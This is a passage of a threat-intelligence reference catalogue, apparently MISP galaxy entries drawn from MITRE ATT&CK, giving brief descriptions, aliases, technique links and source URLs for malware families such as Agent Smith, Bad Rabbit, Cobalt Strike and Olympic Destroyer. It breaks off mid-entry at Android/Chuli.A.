[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India, though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)

The tag is: misp-galaxy:mitre-malware="Agent Smith - S0440"

Agent Smith - S0440 is also known as:

  • Agent Smith

Table 7179. Table References

Links

https://attack.mitre.org/software/S0440

https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/

4H RAT - S0065

[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="4H RAT - S0065"

4H RAT - S0065 is also known as:

  • 4H RAT

4H RAT - S0065 has relationships with:

  • similar: misp-galaxy:rat="4H RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7180. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/software/S0065

Desert Scorpion - S0505

[Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion)

The tag is: misp-galaxy:mitre-malware="Desert Scorpion - S0505"

Desert Scorpion - S0505 is also known as:

  • Desert Scorpion

Table 7181. Table References

Links

https://attack.mitre.org/software/S0505

https://blog.lookout.com/desert-scorpion-google-play

Net Crawler - S0056

[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)

The tag is: misp-galaxy:mitre-malware="Net Crawler - S0056"

Net Crawler - S0056 is also known as:

  • Net Crawler

  • NetC

Net Crawler - S0056 has relationships with:

  • similar: misp-galaxy:malpedia="NetC" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 7182. Table References

Links

https://attack.mitre.org/software/S0056

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Bad Rabbit - S0606

[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware)

The tag is: misp-galaxy:mitre-malware="Bad Rabbit - S0606"

Bad Rabbit - S0606 is also known as:

  • Bad Rabbit

  • Win32/Diskcoder.D

Table 7183. Table References

Links

https://attack.mitre.org/software/S0606

https://securelist.com/bad-rabbit-ransomware/82851/

https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

Green Lambert - S0690

[Green Lambert](https://attack.mitre.org/software/S0690) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://attack.mitre.org/software/S0690) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.(Citation: Kaspersky Lamberts Toolkit April 2017)(Citation: Objective See Green Lambert for OSX Oct 2021)

The tag is: misp-galaxy:mitre-malware="Green Lambert - S0690"

Green Lambert - S0690 is also known as:

  • Green Lambert

Table 7184. Table References

Links

https://attack.mitre.org/software/S0690

https://objective-see.com/blog/blog_0x68.html

https://securelist.com/unraveling-the-lamberts-toolkit/77990/

Saint Bot - S1018

[Saint Bot](https://attack.mitre.org/software/S1018) is a .NET downloader that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

The tag is: misp-galaxy:mitre-malware="Saint Bot - S1018"

Table 7185. Table References

Links

https://attack.mitre.org/software/S1018

https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/

https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

Heyoka Backdoor - S1027

[Heyoka Backdoor](https://attack.mitre.org/software/S1027) is a custom backdoor, based on the Heyoka open-source exfiltration tool, that has been used by [Aoqin Dragon](https://attack.mitre.org/groups/G1007) since at least 2013.(Citation: SentinelOne Aoqin Dragon June 2022)(Citation: Sourceforge Heyoka 2022)

The tag is: misp-galaxy:mitre-malware="Heyoka Backdoor - S1027"

Heyoka Backdoor - S1027 is also known as:

  • Heyoka Backdoor

Table 7186. Table References

Links

https://attack.mitre.org/software/S1027

https://heyoka.sourceforge.net/

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

Action RAT - S1028

[Action RAT](https://attack.mitre.org/software/S1028) is a remote access tool written in Delphi that has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 against Indian and Afghani government personnel.(Citation: MalwareBytes SideCopy Dec 2021)

The tag is: misp-galaxy:mitre-malware="Action RAT - S1028"

Action RAT - S1028 is also known as:

  • Action RAT

Table 7187. Table References

Links

https://attack.mitre.org/software/S1028

https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure

AutoIt backdoor - S0129

[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.

The tag is: misp-galaxy:mitre-malware="AutoIt backdoor - S0129"

AutoIt backdoor - S0129 is also known as:

  • AutoIt backdoor

AutoIt backdoor - S0129 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 7188. Table References

Links

https://attack.mitre.org/software/S0129

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

AuTo Stealer - S1029

[AuTo Stealer](https://attack.mitre.org/software/S1029) is malware written in C++ that has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 to target government agencies and personnel in India and Afghanistan.(Citation: MalwareBytes SideCopy Dec 2021)

The tag is: misp-galaxy:mitre-malware="AuTo Stealer - S1029"

AuTo Stealer - S1029 is also known as:

  • AuTo Stealer

Table 7189. Table References

Links

https://attack.mitre.org/software/S1029

https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure

Agent Tesla - S0331

[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)

The tag is: misp-galaxy:mitre-malware="Agent Tesla - S0331"

Agent Tesla - S0331 is also known as:

  • Agent Tesla

Table 7190. Table References

Links

https://attack.mitre.org/software/S0331

https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/

https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html

https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/

https://www.digitrustgroup.com/agent-tesla-keylogger/

https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html

Small Sieve - S1035

[Small Sieve](https://attack.mitre.org/software/S1035) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)

Security researchers have also noted [Small Sieve](https://attack.mitre.org/software/S1035)'s use by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)

The tag is: misp-galaxy:mitre-malware="Small Sieve - S1035"

Small Sieve - S1035 is also known as:

  • Small Sieve

  • GRAMDOOR

Table 7191. Table References

Links

https://attack.mitre.org/software/S1035

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf

Cobalt Strike - S0154

[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual)

In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual)

The tag is: misp-galaxy:mitre-malware="Cobalt Strike - S0154"

Cobalt Strike - S0154 is also known as:

  • Cobalt Strike

Table 7192. Table References

Links

https://attack.mitre.org/software/S0154

https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf

Ragnar Locker - S0481

[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)

The tag is: misp-galaxy:mitre-malware="Ragnar Locker - S0481"

Ragnar Locker - S0481 is also known as:

  • Ragnar Locker

Ragnar Locker - S0481 has relationships with:

  • similar: misp-galaxy:ransomware="Ragnar Locker" with estimative-language:likelihood-probability="likely"

Table 7193. Table References

Links

https://attack.mitre.org/software/S0481

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/

Woody RAT - S1065

[Woody RAT](https://attack.mitre.org/software/S1065) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.(Citation: MalwareBytes WoodyRAT Aug 2022)

The tag is: misp-galaxy:mitre-malware="Woody RAT - S1065"

Woody RAT - S1065 is also known as:

  • Woody RAT

Table 7194. Table References

Links

https://attack.mitre.org/software/S1065

https://www.malwarebytes.com/blog/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild

SYNful Knock - S0519

[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim’s network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)

The tag is: misp-galaxy:mitre-malware="SYNful Knock - S0519"

SYNful Knock - S0519 is also known as:

  • SYNful Knock

Table 7195. Table References

Links

https://attack.mitre.org/software/S0519

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://www.mandiant.com/resources/synful-knock-acis

Power Loader - S0177

[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

The tag is: misp-galaxy:mitre-malware="Power Loader - S0177"

Power Loader - S0177 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181" with estimative-language:likelihood-probability="almost-certain"

Table 7196. Table References

Links

https://attack.mitre.org/software/S0177

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

Brave Prince - S0252

[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="Brave Prince - S0252"

Brave Prince - S0252 is also known as:

  • Brave Prince

Table 7197. Table References

Links

https://attack.mitre.org/software/S0252

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Smoke Loader - S0226

[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware. [Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)

The tag is: misp-galaxy:mitre-malware="Smoke Loader - S0226"

Smoke Loader - S0226 is also known as:

  • Smoke Loader

  • Dofoil

Smoke Loader - S0226 has relationships with:

  • similar: misp-galaxy:tool="Smoke Loader" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="SmokeLoader" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

Table 7198. Table References

Links

https://attack.mitre.org/software/S0226

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

Linux Rabbit - S0362

[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)

The tag is: misp-galaxy:mitre-malware="Linux Rabbit - S0362"

Linux Rabbit - S0362 is also known as:

  • Linux Rabbit

Table 7199. Table References

Links

https://attack.mitre.org/software/S0362

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

Stealth Mango - S0328

[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)

The tag is: misp-galaxy:mitre-malware="Stealth Mango - S0328"

Stealth Mango - S0328 is also known as:

  • Stealth Mango

Table 7200. Table References

Links

https://attack.mitre.org/software/S0328

https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf

Corona Updates - S0425

[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)

The tag is: misp-galaxy:mitre-malware="Corona Updates - S0425"

Corona Updates - S0425 is also known as:

  • Corona Updates

  • Wabi Music

  • Concipit1248

Table 7201. Table References

Links

https://attack.mitre.org/software/S0425

https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/

Gold Dragon - S0249

[Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="Gold Dragon - S0249"

Gold Dragon - S0249 is also known as:

  • Gold Dragon

Table 7202. Table References

Links

https://attack.mitre.org/software/S0249

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Caterpillar WebShell - S0572

[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-malware="Caterpillar WebShell - S0572"

Caterpillar WebShell - S0572 is also known as:

  • Caterpillar WebShell

Table 7203. Table References

Links

https://attack.mitre.org/software/S0572

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Cobian RAT - S0338

[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)

The tag is: misp-galaxy:mitre-malware="Cobian RAT - S0338"

Cobian RAT - S0338 is also known as:

  • Cobian RAT

Table 7204. Table References

Links

https://attack.mitre.org/software/S0338

https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

Cardinal RAT - S0348

[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low-volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)

The tag is: misp-galaxy:mitre-malware="Cardinal RAT - S0348"

Cardinal RAT - S0348 is also known as:

  • Cardinal RAT

Table 7205. Table References

Links

https://attack.mitre.org/software/S0348

https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

Golden Cup - S0535

[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup)

The tag is: misp-galaxy:mitre-malware="Golden Cup - S0535"

Golden Cup - S0535 is also known as:

  • Golden Cup

Table 7206. Table References

Links

https://attack.mitre.org/software/S0535

https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans

Olympic Destroyer - S0365

[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)

The tag is: misp-galaxy:mitre-malware="Olympic Destroyer - S0365"

Olympic Destroyer - S0365 is also known as:

  • Olympic Destroyer

Table 7207. Table References

Links

https://attack.mitre.org/software/S0365

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://www.justice.gov/opa/press-release/file/1328521/download

Revenge RAT - S0379

[Revenge RAT](https://attack.mitre.org/software/S0379) is a freely available remote access tool written in .NET (C#).(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)

The tag is: misp-galaxy:mitre-malware="Revenge RAT - S0379"

Revenge RAT - S0379 is also known as:

  • Revenge RAT

Table 7208. Table References

Links

https://attack.mitre.org/software/S0379

https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517

Rising Sun - S0448

[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)

The tag is: misp-galaxy:mitre-malware="Rising Sun - S0448"

Rising Sun - S0448 is also known as:

  • Rising Sun

Table 7209. Table References

Links

https://attack.mitre.org/software/S0448

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf

JSS Loader - S0648

[JSS Loader](https://attack.mitre.org/software/S0648) is a Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)

The tag is: misp-galaxy:mitre-malware="JSS Loader - S0648"

JSS Loader - S0648 is also known as:

  • JSS Loader

Table 7210. Table References

Links

https://attack.mitre.org/software/S0648

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc

DEFENSOR ID - S0479

[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim’s bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android’s accessibility service.(Citation: ESET DEFENSOR ID)

The tag is: misp-galaxy:mitre-malware="DEFENSOR ID - S0479"

DEFENSOR ID - S0479 is also known as:

  • DEFENSOR ID

Table 7211. Table References

Links

https://attack.mitre.org/software/S0479

https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/

Tiktok Pro - S0558

[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)

The tag is: misp-galaxy:mitre-malware="Tiktok Pro - S0558"

Tiktok Pro - S0558 is also known as:

  • Tiktok Pro

Table 7212. Table References

Links

https://attack.mitre.org/software/S0558

https://www.zscaler.com/blogs/security-research/tiktok-spyware

Cyclops Blink - S0687

[Cyclops Blink](https://attack.mitre.org/software/S0687) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.(Citation: NCSC Cyclops Blink February 2022)(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022)

The tag is: misp-galaxy:mitre-malware="Cyclops Blink - S0687"

Cyclops Blink - S0687 is also known as:

  • Cyclops Blink

Table 7213. Table References

Links

https://attack.mitre.org/software/S0687

https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf

https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

Trojan-SMS.AndroidOS.FakeInst.a - S0306

[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.FakeInst.a - S0306"

Trojan-SMS.AndroidOS.FakeInst.a - S0306 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 7214. Table References

Links

https://attack.mitre.org/software/S0306

https://securelist.com/mobile-malware-evolution-2013/58335/

Trojan-SMS.AndroidOS.Agent.ao - S0307

[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.Agent.ao - S0307"

Trojan-SMS.AndroidOS.Agent.ao - S0307 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 7215. Table References

Links

https://attack.mitre.org/software/S0307

https://securelist.com/mobile-malware-evolution-2013/58335/

Trojan-SMS.AndroidOS.OpFake.a - S0308

[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.OpFake.a - S0308"

Trojan-SMS.AndroidOS.OpFake.a - S0308 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 7216. Table References

Links

https://attack.mitre.org/software/S0308

https://securelist.com/mobile-malware-evolution-2013/58335/

Mis-Type - S0084

[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) by 2012.(Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="Mis-Type - S0084"

Mis-Type - S0084 is also known as:

  • Mis-Type

Mis-Type - S0084 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7217. Table References

Links

https://attack.mitre.org/software/S0084

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

S-Type - S0085

[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2013.(Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="S-Type - S0085"

S-Type - S0085 is also known as:

  • S-Type

S-Type - S0085 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"

Table 7218. Table References

Links

https://attack.mitre.org/software/S0085

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

Hi-Zor - S0087

[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)

The tag is: misp-galaxy:mitre-malware="Hi-Zor - S0087"

Hi-Zor - S0087 is also known as:

  • Hi-Zor

Hi-Zor - S0087 has relationships with:

  • similar: misp-galaxy:rat="Hi-Zor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7219. Table References

Links

https://attack.mitre.org/software/S0087

https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/

Miner-C - S0133

[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines the Monero cryptocurrency on infected hosts. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)

The tag is: misp-galaxy:mitre-malware="Miner-C - S0133"

Miner-C - S0133 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

Table 7220. Table References

Links

http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml

https://attack.mitre.org/software/S0133

Seth-Locker - S0639

[Seth-Locker](https://attack.mitre.org/software/S0639) is ransomware with some remote control capabilities that has been in use since at least 2021. (Citation: Trend Micro Ransomware February 2021)

The tag is: misp-galaxy:mitre-malware="Seth-Locker - S0639"

Seth-Locker - S0639 is also known as:

  • Seth-Locker

Table 7221. Table References

Links

https://attack.mitre.org/software/S0639

https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

Aria-body - S0456

[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since approximately 2017.(Citation: CheckPoint Naikon May 2020)

The tag is: misp-galaxy:mitre-malware="Aria-body - S0456"

Aria-body - S0456 is also known as:

  • Aria-body

Table 7222. Table References

Links

https://attack.mitre.org/software/S0456

https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/

S.O.V.A. - S1062

[S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for "owl", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)

The tag is: misp-galaxy:mitre-malware="S.O.V.A. - S1062"

S.O.V.A. - S1062 is also known as:

  • S.O.V.A.

Table 7223. Table References

Links

https://attack.mitre.org/software/S1062

https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly

https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html

Android/Chuli.A - S0304

[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)

The tag is: misp-galaxy:mitre-malware="Android/Chuli.A - S0304"

Android/Chuli.A - S0304 is also known as:

  • Android/Chuli.A

Android/Chuli.A - S0304 has relationships with:

